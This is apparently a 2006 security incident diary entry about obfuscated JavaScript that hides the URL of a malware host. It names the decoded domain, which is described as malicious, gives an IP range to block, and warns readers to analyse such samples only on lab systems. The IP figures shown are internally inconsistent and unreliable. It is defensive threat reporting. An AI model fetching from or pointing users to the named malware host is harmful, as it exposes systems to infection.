Last Updated: 2006-10-31 21:00:38 UTC
by Daniel Wesemann (Version: 1)
Now, anyone can tell from looking at this that whoever wrote this code is trying to hide something. Gone are the days when simple substitutions (like: encoded B is an A, encoded C is a B, etc) were used to hide the URLs where the next bit of nefarious code was pulled from. Over the last months, attackers have apparently evolved beyond first grade math, to highly complex :) concoctions involving binary "shift" and "bitwise and" operations. Wow!
The de-obfuscated URL goes to (dont click!!) js.pceb.cc, which resolves to 18.104.22.168, which is - surprise surprise - the address range of INHoster in Ukraine. Although we are wary of excessive block-lists, we have repeatedly recommended in the past that you block this range (http://isc.sans.org/diary.php?storyid=997): 22.214.171.124 - 126.96.36.199 . Do it now, and next time they dish up a new treat, it wont trick your users.
Caveat: Try and decode such critters only on a lab system. Careful malware analysts tend to reinstall their systems and change their jobs far less frequently than those who think they got it all down phat.
Please choose a specific diary above to comment